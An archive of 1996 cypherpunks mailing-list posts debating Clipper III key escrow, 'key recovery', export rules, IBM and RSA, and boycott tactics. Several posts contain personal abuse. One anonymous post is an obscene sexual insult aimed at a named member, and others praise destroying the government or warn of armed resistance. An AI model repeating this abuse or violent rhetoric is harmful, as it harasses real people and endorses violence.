From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 4 Oct 1996 12:44:51 +0800
To: cypherpunks@toad.com
Subject: Clipper III questions
Message-ID: <199610040135.SAA24060@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain




The recent CDT policy post sez of Clipper III:

>* Access to keys internationally "would be provided in accordance with
>  destination country policies and bilateral understandings."


This reminds me of the understanding between CIA/NSA and their counterparts
in British Intelligence.  Both sides are prohibited from spying within
their own countries borders but are encouraged to spy in other countries.
Both would very much like to spy on their own citizens (for legitimate
law encorcement/national security reasons only, of course).

So, they have a simple system in place.  The British spy on the American
citizens that the Americans want spied on and then turn over the intercepts.
The Americans do the same for the British in Britain(*). 
Sometimes they lie to each other or withhold material, but that's
what spy organizations do all the time.

If Clipper III passes and the OECD gets their member nations in line
with what the American miliary wants, I predict a similar system will evolve.
"Destination country policies" will allow decryption of incoming
GAKked messages from non-citizens.  After all, they have no rights, do
they?  Cooperating intelligence agencies will then exchange intercepts.
Presto Chango, pesky privacy rules vanish right before your eyes!
Of course this is in our best intrest, we must fight against
terrorisim with all methods possible.  The ends justify the means.



A question:   What happens if a company decided not to go along
with Clipper III?  Can they still ship the "old" 40-bit-style GAKware
unimpeded?  Or will there be a slow tightening of the rules to
force compliance?  The existing way of doing things depends to a
large degree on a set of "common practice" which the NSA
doesn't have written down.  For example you won't find the 40 bit limit
written anywhere in ITAR, and if you want to export something
that's already been approved elsewhere (i.e. another implementation
of SSL) you still have to go through the approval process.



(*) this comes from "The War Aginst the Jews" which is worth
reading.  Sorry I can't find my copy at the moment, maybe someone
who's got it handy will provide authors/ISBN.  Capsule review:
covers government dirty dealing from the early 1900s on, mostly
British and American.  Concentrates on Jews and Israel of course
but they seem to have been the brunt (sometimes the instigator)
of a lot of the dirty pool that governments have played.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 4 Oct 1996 21:03:55 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Did Sun get a sweetheart deal?
In-Reply-To: <199610040001.RAA15595@ohio.chromatic.com>
Message-ID: <Pine.3.89.9610031804.A16004-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 3 Oct 1996, Ernest Hua wrote:

>   Sun Microsystems Inc. said Wednesday it received two contracts from
>   NASA's Goddard Space Flight Center worth a total of $100 million. The
>   Mountain View-based company said the pact calls for software
>   development and the design about 34,000 computer-aided engineering
>   and design workstations. NASA will use the workstations to design
>   integrated circuits.

34,000 Sun workstations? If any of the software designers from Sun are 
reading this, I would like to make a suggestion as to the screensaver 
that will ship with every workstation.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 4 Oct 1996 11:44:20 +0800
To: froomkin@law.miami.edu (Michael Froomkin - U.Miami School of Law)
Subject: [NOISE] ITAR Satellite
In-Reply-To: <Pine.SUN.3.95.961003140348.764J-100000@viper.law.miami.edu>
Message-ID: <199610032246.SAA00876@nrk.com>
MIME-Version: 1.0
Content-Type: text


Michael Froomkin - U.Miami School of Law sez:
> 
> Alas, a common fallacy.
> 
> You have committed a prohibited export when the stuff lands outside the
> USA....It's not illegal when it goes up ("by reason of the launching" and,
> e.g. *stays up* in orbit)  but it is illegal when it comes down abroad. 
> 

"I just shoots them, who CARES where they come down?
It's not my department, said Werner Von Braun...."

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 4 Oct 1996 13:06:51 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: gack vs. key escrow vs. key recovery
In-Reply-To: <199610040033.RAA18660@netcom19.netcom.com>
Message-ID: <199610040153.SAA24250@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri writes:
> 
> cpunks, a note about recent developments in "key recovery" initiative.

[...]

> is the government always going to be your 
> enemy, no matter what they do?

It seems to be bent on doing so.

> I have posted here before that many companies find the concept
> of "key recovery" highly acceptable and even desirable. the 
> basic question is, what does this mean to wiretapping and 
> search warrants and subpoenas?

They get served, and the keys are produced.  Same with personal
crypto- if I'm in court and some encryped file that I have the 
key for is demanded as evidence, I provide the key or get
hit with contempt of court, my choice.
No one is arguing about that.  The objections to Clipper III are:

1. built-in wiretapping. Clipper III requires that subjects of
"key recovery" wiretaps are not notified of the government's
"recovery" of their keys.  While this _is_ analagous to phone
wiretaps, it is not of anything else.  The cops have to serve
you a warrant, not sneak in and read the papers in your desk.
Why should encrypted files be different?

2. Coercion.  I don't see anything wrong with key escrow
(original meaning, not GAK).  I think it's useful for business.
Required for some.  It's being coerced to implement it that is
distasteful.  If you think that Clipper III isn't coercion, you're
wrong- note that the licenses to export GAKware are reviewed every 6 months
and expire after 2 years if GAK isn't in place.  That's a clear
"you're on our side or your not" from the government.  Having
the possibility of your product suddenly becoming worthless
every 6 months will keep companies in line.

3.  It's still too weak. 56 bit DES isn't enough- it can very probably be
cracked in < 12 seconds by the NSA.  If not real time.

4.  It's the camel's nose in the tent.  First "key recovery"
then full GAK then penalties/jail time for for "terrorists"
or "gang members" who use unGAKd crypto.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 4 Oct 1996 12:45:05 +0800
To: cypherpunks@toad.com
Subject: Re: Did Sun get a sweetheart deal?
In-Reply-To: <199610040001.RAA15595@ohio.chromatic.com>
Message-ID: <v03007801ae7a2c50d26f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:01 PM -0700 10/3/96, Ernest Hua wrote:
>So why did Sun cave in?
>
>Ern
>
>-------- From San Jose Mercury: "Good Morning Silicon Valley"
>
>NASA has its day in the Sun
>
>  Sun Microsystems Inc. said Wednesday it received two contracts from
>  NASA's Goddard Space Flight Center worth a total of $100 million. The
>  Mountain View-based company said the pact calls for software
>  development and the design about 34,000 computer-aided engineering
>  and design workstations. NASA will use the workstations to design
>  integrated circuits.

If this theory is true, look for Apple to see some reprieves in government
conversions away from Macs towards Windows.

(To those who don't follow the Mac market, the weekly trade mag, "MacWeek,"
reports frequently on various government agencies deciding to replace Macs
with Windows machines. Users of Macs are often freaked out by this, of
course, and write letters urging the government to reconsider. If Ernest
Hua's theory is even slightly on-target, there may be some reversals of
this "everybody needs to be using Windows" government edict.)

--Tim May

(By the way, I've added some new stuff to my .sig. The apparent infighting,
with Jim Bidzos trashing NSA and IBM, is delicious. Maybe Jim will withdraw
his support. Of course, he's got multiple tens of millions of bucks riding
on the balance, and there's that threat I reported on a couple of years
ago, where an NSA guy said they could always run him over in the parking
lot if he didn't play ball.)


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 20:11:28 +0800
To: froomkin@law.miami.edu (Michael Froomkin - U.Miami School of Law)
Subject: Re: [NOISE] ITAR Satellite
Message-ID: <199610040209.TAA03849@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:46 PM 10/3/96 -0400, David Lesher wrote:
>Michael Froomkin - U.Miami School of Law sez:
>> 
>> Alas, a common fallacy.
>> 
>> You have committed a prohibited export when the stuff lands outside the
>> USA....It's not illegal when it goes up ("by reason of the launching" and,
>> e.g. *stays up* in orbit)  but it is illegal when it comes down abroad. 
>> 
>
>"I just shoots them, who CARES where they come down?
>It's not my department, said Werner Von Braun...."
 

No... not exactly.

"Vhen the rockets go up...
who cares vhere they come down...

That's not my department...
says Werner Von Braun."

Tom Lehrer.  1965.  "That was the year that Was."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 4 Oct 1996 23:33:33 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: gack vs. key escrow vs. key recovery
In-Reply-To: <199610040033.RAA18660@netcom19.netcom.com>
Message-ID: <Pine.3.89.9610031857.A20673-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 3 Oct 1996, Vladimir Z. Nuri wrote:
> what is the precise difference between gack, key escrow, and
> key recovery? TCM has argued that the administration is muddying
> the issue by manipulating the terminology.

I don't know if Tim said that as well, but I certainly did. The 
government's move is ingenious. By appropriating the term "key recovery" for GAK, the 
government made it almost impossible to discern between key recovery as 
required in many commercial environments and GAK as required by an 
Orvelian surveillance state.

> perhaps so, but I feel
> that cpunks are equally guilty, by branding anything that emanates
> out of the government as inherently orwellian. do you always have
> to have an enemy? is the government always going to be your 
> enemy, no matter what they do?

Yes. What is good for the government and what is 
good for the people will always be opposite.

 > I have posted here before that many companies find the concept
> of "key recovery" highly acceptable and even desirable. the 
> basic question is, what does this mean to wiretapping and 
> search warrants and subpoenas?

I agree that true key recovery for the corporate environment is often 
desirable. I do not believe that it will ever have to include an outside 
'escow" agent.

 > it is clear we are coming to a fork in the road at this 
moment.
> there are going to be two types of cpunk opinions based on recent
> developments.
> 
> 1. those who feel that wiretapping was illegitimate from the
> start and are working to make wiretapping impossible. confronted
> with a legal search warrant/subpoena etc. for personal data, 
> they would not hand over keys. they would "superencrypt" in
> systems that do etc.

That's me.

[opposing view elided for brevity only]
 
> those who continue to pursue (1) are going to be perceived as
> more and more radical and extremist, because arguably it is not
> even a system we have today or one that was ever devised.
> remember, the constution guarantees
> freedom from *unreasonable* search and seizure, but never
> prohibited search and seizure in the first place!! apparently
> at least our found fathers believed that "reasonable" search
> and seizure was a wholly legitimate function of government,
> based on this wording.

The problem is that what the Funding Fathers considered "reasonable" and 
what today's courts consider reasonable have *nothing* in common.

[...]
> I'll be watching the debate closely, as the true extremists
> incapable of compromise (and thereby living in a fantasy world)
> show their colors....

Those who believe that the infringements on our rights can continue for 
all times with impunity are living in a fantasy world. While I am a 
peaceful, non-violent person, an ever increasing number of others feel 
differently. If the government 
continues on the course they are on - and requiring (never mind the 
'voluntary') GAK is doing just that - there will be those who will feel that 
armed resistance is the only option left. I will try everything in my 
power to not let it come to that. Therefore I must oppose GAK.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 4 Oct 1996 23:37:19 +0800
To: cypherpunks@toad.com
Subject: Re: "Macintosh -- the Surveillance System for the Rest of Us
In-Reply-To: <v03007801ae79f80a6c10@[207.167.93.63]>
Message-ID: <v03007803ae7a303fbec9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:48 PM -0400 10/3/96, Robert Hettinga wrote:

>If one were to be completely uncharitable in the interpretation of Tim's
>most recent outbreak of vitriol here, it would seem that he's offended that

My comments here are not vitriolic, just factual. Clearly, while the
"guerilla" crypto meeting was happening, the higher-ups were selling out
their customers and going much further than they needed to in ensuring a
Big Brother State.

(BTW, in response to my "the surveillance system for the rest of us"
comment, Andrew Loewenstern sent me a note in which he contrasted Apple's
"1984" commercial with the current reality.)

>he wasn't asked first to be the keynote at MacCrypto, the conference a
>bunch of us had at Apple a month ago, which, I might add, was a
>considerable success.

This is the epitome of armchair psychoananalysis. How can you _possibly_
know what I thought about things? Jeez.

>Of course, the real irony here is that Tim *was* the first person we asked
>to keynote. The irony compounds itself slightly more when you consider the
>*last* person who we asked, Phil Zimmermann, at the *last* possible minute,
>graciously accepted our invitation and delivered his keynote speech to a
>very enthusiastic crowd.

Who cares? Such comparisons are odious. I responded to Vinnie, not to the
"us" implied in "we asked," and the matter would've remained between Vinnie
and me had he not shared our e-mail with you and had you not then gone into
one of your  "free association" rants. Recall that even Vinnie was highly
critical of this performance.

>Anyway, let us *be* charitable, and take Tim's apparent vituperation about
>Apple's complete capitulation to government pressure, not to mention the
>appalling failure of the MacCrypto conference to lob any clues over the
>walls of Fortress Apple, entirely at their face value, shall we?
>
>Let's assume that he really *wasn't* trying to rattle the bars on the Mac
>crypto community's collective cage, and that he actually was trying to
>contribute something constructive to what appears to be a *truly* apalling
>situation to anyone who wants strong crypto, and thus internet commerce, to
>be transparent and easy to do on the Macintosh. The Mac crypto community's
>cage is plenty rattled by the recent news from Washington, as it is.

Fuck off, to be blunt. You've got to learn to start making actual points,
and not trying to show your writing chops from the Hunter S. Thompson
Correspondence School of Creative Writing.


>Frankly, I'd rather see actual code being written than press releases,
>wouldn't you, Tim?

Fuck off. Back into my killfile you go.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 4 Oct 1996 20:01:50 +0800
To: cypherpunks@toad.com
Subject: Re: "Mormon Asshole?"  re: GAK
In-Reply-To: <199610031843.MAA10736@infowest.com>
Message-ID: <k2X9uD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


attila <attila@primenet.com> writes:
<pro-GAK mor(m)on propaganda skipped>
>   "The only natural criminal class in America, the U.S. Congress"
>         --Mark Twain

Mark Twain had some very negative things to say about your criminal cult.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 4 Oct 1996 13:17:19 +0800
To: "snajdr@pvt.net>
Subject: Re: WINDOWS NT ????
Message-ID: <19961004024009156.AAA66@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 03 Oct 1996 19:47:06 +1030, Petr Snajdr wrote:


> is Windows NT secured system ?

No.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 4 Oct 1996 13:43:26 +0800
To: cypherpunks@toad.com
Subject: [ANNOUNCEMENT] Cyclic codes
Message-ID: <199610040243.TAA23771@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Now is the time for all good little boys to cum in Timmy May's big mouth.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petr Snajdr <snajdr@pvt.net>
Date: Fri, 4 Oct 1996 06:22:05 +0800
To: cypherpunks@toad.com
Subject: WINDOWS NT ????
In-Reply-To: <v03007802ae77bdc0e257@[207.167.93.63]>
Message-ID: <32538492.248D9F32@pvt.net>
MIME-Version: 1.0
Content-Type: text/plain


hi,
 is Windows NT secured system ?



--
Petr Snajdr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Fri, 4 Oct 1996 19:58:22 +0800
To: "'cypherpunks@toad.com>
Subject: DESCrack keyspace partitioning
Message-ID: <01BBB163.FC317940@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain




What about the heuristics of partitioning the keyspace?

Seems to me that a _subset_ of all possible keys is much more likely
to appear than a random selection from an equidistributed population 0..2^56.

(P)RNG's just aren't that likely to produce a key of 010101010.....
nor 001100110011... etc etc and I have been thinking about how one might formalize 
and exploit this randomness property to increase the probability of finding the key sooner.

So a keysearch strategy should be something other than a partitioning of 2^26 into N bins
with a linear search within each bin.  I realize that it is POSSIBLE that a key of 1010101010...
was used, (excluding weak keys from consideration) ---- but I have seen "certifiable" RNG's and,
God Bless 'em, they just dont ever produce anything with any predictability.  

Is not the lack of predictability a predictable, and therefore exploitable, attribute?

Any thoughts here?




----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Fri, 4 Oct 1996 19:39:37 +0800
To: cypherpunks@toad.com
Subject: Pager security
Message-ID: <9610032348.AA22047@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Lest anyone doubt this, pagers in the US have the same exact
vulnerability as those in the UK.  No current paging systems use
any kind of serious encryption and all can be intercepted by using
a scanner, a very simple data detector consisting of one IC and 
an ordinary PC running appropriate software.

	I wrote a USENET article about decoding POCSAG paging back in 1993,
and am aware of at least four different individuals who have implemented
programs based in part on my description of the protocol - three of whom
have sold the product to the hobbiest market.

							Dave  Emery  N1PRE
							die@die.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 4 Oct 1996 12:39:49 +0800
To: cypherpunks@toad.com
Subject: Margaret Milner Richardson loses her breakfast...
Message-ID: <v03007802ae79fed8a057@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


>From the Wall Street Journal Wednesday October 2, Page 1:

Use of the internet to attract tax-dodgers rings alarm bells at the IRS.
The rapidly expanding new worlds of the internet and electronic money are
stirring deep concern at the IRS. "We know that some foriegn banks are now
using the internet to solicit new customers with promises of complete
anonymity and a haven from all taxes," IRS commissioner Margaret Milner
Richardson said. She said this issue is being "carefully monitored" by tax
administrators around the world.

Ms. Richardson, in a recent speech, cited a world-wide-web advertisement
offering a "one-of-a-kind book" covering topics such as, "Banking in
Silence" and offering information on setting up an offshore trust that
"could include protection from a large IRS assessment." Ms. Richardson's
reaction: "I almost take that personally." Another ad touts "excellent
interest rates, offered in a stable, tax-free environment...Clients
communicate with the bank any time from anywhere via the internet."

Ms. Richardson said: "How would you like to be responsible for
administering tax laws and have to read these ads over breakfast?"


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 4 Oct 1996 19:15:00 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Margaret Milner Richardson loses her breakfast...
In-Reply-To: <v03007802ae79fed8a057@[206.119.69.46]>
Message-ID: <Pine.3.89.9610031957.A24337-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 3 Oct 1996, Robert Hettinga wrote:

> Ms. Richardson said: "How would you like to be responsible for
> administering tax laws and have to read these ads over breakfast?"

My heart bleeds for her :-) [what's the smiley for a huge grin?]

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 13:59:53 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: gack vs. key escrow vs. key recovery
Message-ID: <199610040306.UAA07562@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:33 PM 10/3/96 -0700, Vladimir Z. Nuri wrote:
>cpunks, a note about recent developments in "key recovery" initiative.
>
>I think cpunks as a group should reconsider very seriously their
>own positions on cryptography and come up with something more
>sophisticated than "any government bill or plan associated with
>crypto is evil" which is the functional equivalent of the ideology
>behind many recent posts.

We don't think they're all NECESSARILY evil...they just turn out that way.

Whose fault is this?


>what is the precise difference between gack, key escrow, and
>key recovery? 

Phase of moon?  Season?  Maybe it has something to do with the 11-year 
sunspot cycle?  Bi-millenialism?

>TCM has argued that the administration is muddying
>the issue by manipulating the terminology. perhaps so, but I feel
>that cpunks are equally guilty, by branding anything that emanates
>out of the government as inherently orwellian. do you always have
>to have an enemy? is the government always going to be your 
>enemy, no matter what they do?

The government seems to be BEHAVING as if it is always going to be our 
enemy.    Whose fault is that?


>I have posted here before that many companies find the concept
>of "key recovery" highly acceptable and even desirable. the 
>basic question is, what does this mean to wiretapping and 
>search warrants and subpoenas?
>it is clear we are coming to a fork in the road at this moment.

And it is our goal to not "get forked."


>there are going to be two types of cpunk opinions based on recent
>developments.
>
>1. those who feel that wiretapping was illegitimate from the
>start and are working to make wiretapping impossible. confronted
>with a legal search warrant/subpoena etc. for personal data, 
>they would not hand over keys. they would "superencrypt" in
>systems that do etc.

That's me...


>2. those who feel that there is such a thing as a legal warrant
>or subpoena for information protected by cryptography keys, and
>would agree that this logically means that governments will be
>getting access to "key recovery" infrastructures.

On the contrary:  The existence of a "legal warrant" doesn't mean that the 
government ought to (or even can) get access to data via a "key recovery" 
system.  It's been mentioned numerous times that there are plenty of things 
that could be done (multiple encryption; encryption of GAK'd key; foreign 
key escrow with no request cooperation, etc) to prevent this.


>personally I am leaning toward 2, because I feel that we already
>live in such a society,

We also live in a violent, oppressive society.  Does this mean that we 
shouldn't try to fix its problems?

> and that it is not orwellian.

Pollyanna, meet Eric Blair.

> companies are going to lean toward (2).


No, they're going to lean towards yet another system, (3), whatever suits them.

> I do agree
>that the gov't has the potential to twist this process to evil
>ends,

If it had not had the desire to "twist this process to evil ends" government 
wouldn't have interfered with the natural development of key-keeping systems 
which serve only the key owner, not anyone else.

> but that has always been true of everything about democratic
>government, and the recipe for 200+ years has always been
>and remains "eternal vigilance". in other words, I am in favor
>of some kind of mechanism by which the government can obtain
>keys via subpoenas/warrants.

And I am in favor of some kind of mechanism by which the government can be 
destroyed by ordinary citizens.


>cpunks, I think we should try to clarify our terms and come to
>some conclusions. 
>
>those who continue to pursue (1) are going to be perceived as
>more and more radical and extremist, because arguably it is not
>even a system we have today or one that was ever devised.

I'd disagree with that.  I've devised a system...


>remember, the constution guarantees
>freedom from *unreasonable* search and seizure, but never
>prohibited search and seizure in the first place!! apparently
>at least our found fathers believed that "reasonable" search
>and seizure was a wholly legitimate function of government,
>based on this wording.

I guess that means that anything they call "reasonable," you'll agree with?

Hint:  Between about 1932 and 1968, wiretaps in the US were ILLEGAL.  
Nevertheless, they were done anyway, by the telephone company on request by 
the cops. (they were not admissible in court, however.)   Question:  Should 
we define the standard of 'reasonable' on the opinion of a group of people 
(cops, officials, politicians) who have a proven habit of using illegal 
techniques to get information?

Apparently, cops are unwilling to let illegality get in their way.  I'd say, 
on the whole, cops must have a rather enormous motivation to get wiretaps, 
and only a fool would think that this would fail to motivate them to adjust 
their standard of "reasonableness."

>regarding (2): the government may actually help bring crypto
>to the masses via the post office and other routes. are
>cpunks going to continue to hold the simplistic, reactionary,
>knee-jerk, black-and-white opinion that "anything with the
>word 'government' in it is evil"? "if the government is doing
>something, then we must sabotage it"?

So far, such an opinion would fit the facts far better than anything you've 
said so far.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 4 Oct 1996 11:25:34 +0800
To: Jim McCoy <mccoy@communities.com>
Subject: Re: Fighting Clipper III
In-Reply-To: <v03007802ae791065bbd7@[205.162.51.35]>
Message-ID: <Pine.LNX.3.94.961003203224.890A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Oct 1996, Jim McCoy wrote:

> Date: Wed, 2 Oct 1996 22:46:58 -0800
> From: Jim McCoy <mccoy@communities.com>
> To: cypherpunks@toad.com
> Subject: Fighting Clipper III
> 
> Rich Burroughs <richieb@teleport.com> wrote:
> [...]
> >>>On Wed, 2 Oct 1996, John Young wrote:
> >>>
> >>>>    The New York Times, October 2, 1996, pp. D1, D8.
> >>>>    Executives of the International Business Machines
> >>>>    Corporation said late yesterday that they were still lining
> >>>>    up the final list of companies in the alliance. Those
> >>>>    involved will include Digital Equipment and smaller
> >>>>    data-security companies including RSA Data Security, Cylink
> >>>>    and Trusted Information Systems.
> >>>
> >>>We are in deep trouble.
> >>
> >>Wouldn't a letter-writing campaign be in order here?
> >[snip]
> >
> >The word "boycott" leaped into my mind.  I personally do not believe that I
> >will be buying products from any of these companies, as long as thay
> >participate in this GAK charade.
> 
> Such an initiative will need publicity and letter-writing early in the
> campaign will help us set the tone and points of debate on this issue.
> A boycott works best when everyone knows why and there are a few key
> phrases which can be used to get the message across.  Something like
> "company X is helping build big brother, boycott their products" or a
> few similar sound bites are needed fast.  The big brother inside stickers
> from the last campaign were nice, maybe people can come up with variations
> of various corporate logos or marketting phrases which help get the message
> across?
> 
> jim
> 

I agree wholeheartedly.  A boycott will be usefull, as would letter
writing campaigns, bumper stickers, etc.  The entire idea, though , must
be _VERY PUBLIC_ to be useful.

 --Deviant
There is a theory which states that if ever anyone discovers exactly what
the Universe is for and why it is here, it will instantly disappear and be
replaced by something even more bizarre and inexplicable.  There is another
theory which states that this has already happened.
                -- Douglas Adams, "The Hitchhiker's Guide to the Galaxy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 4 Oct 1996 19:05:01 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Fighting Clipper III
In-Reply-To: <9610031655.AA00896@ch1d157nwk>
Message-ID: <Pine.SUN.3.91.961003203532.14527B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


IBM truly does deserve to be criticized, soundly. When I get a chance I'll
write up the report of what happened at yesterday's IBM "let's recruit
industry to join our alliance" confab session that took place in the
afternoon at their DC lobby-office. It was supposedly closed to the 
press. :)

-Declan


On Thu, 3 Oct 1996, Andrew Loewenstern wrote:

> Jim McCoy writes:
> >  The big brother inside stickers from the last campaign were
> >  nice, maybe people can come up with variations of various
> >  corporate logos or marketting phrases which help get the
> >  message across?
> 
> Big Brother Inside stickers are a classic and should be revived.  I would  
> like to see a takeoff of the IBM logo since they are the ones who seem to be  
> cozying up to the USG the most (with the exception of TIS whom nobody has ever  
> heard of).   How about "GAK" in the familiar IBM blue pinstripe logo?  Or  
> "IBBM"  International Big Brother Machines?  Everyone recognizes the IBM logo.
> 
> 
> andrew
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 4 Oct 1996 22:24:12 +0800
To: Walt Armour <walt@animal.blarg.net>
Subject: Re: Key recovery/RSA/Bidzos/WTF?!?
In-Reply-To: <199610031655.JAA18003@animal.blarg.net>
Message-ID: <Pine.SUN.3.91.961003203749.14527C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


PC World (at www.pcworld.com) has a radio interview with Bidzos, I'm 
told, probably in the same story for which they interviewed me.

-Declan


On Thu, 3 Oct 1996, Walt Armour wrote:

> What's up with some of these press releases?
> 
> Can anyone clear up the confusion with RSA/Bidzos/Key recovery?
> 
> Here are some quotes:
> 
> =================
> 
> >From NYT:CyberTimes (2 Oct)
> "Clinton Encryption Plan Is Generating Resistance"
> 
> Executives of the International Business Machines Corp. said
> late Tuesday that they were still lining up the final list of
> companies in the alliance. Those involved will include Digital
> Equipment and smaller data-security companies including RSA
> Data, Cylink and Trusted Information Systems. 
> 
> =================
> 
> >From NYT:CyberTimes (2 Oct)
> "Clinton Encryption Plan Is Generating Resistance"
> 
> "The government announcement is disastrous," said Jim Bidzos,
> chief executive of RSA Data Security, one of the country's
> leading developers of data-scrambling software. "We warned IBM
> that the National Security Agency would try to twist their
> technology." 
> 
> =================
> 
> >From BusinessWire (2 Oct)
> "JOINT PRESS ANNOUNCEMENT/ HIGH-TECH LEADERS JOIN FORCES TO
> ENABLE INTERNATIONAL STRONG ENCRYPTION"
> 
> "Export controls are a fact of life," said Jim Bidzos, president
> of RSA Data Security. "The key recovery alliance's approach will
> allow companies to use cryptography with differing levels of
> security in an interoperable way. When the alliance implements
> this technology it will give the user a new level of flexibility
> that did not exist before. In an imperfect world this technique
> will at least allow you to take advantage of what governments
> around the world will allow."
> 
> =================
> 
> So is RSA part of this or not? 
> Is the middle quote above mis-attributed?
> 
> walt
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
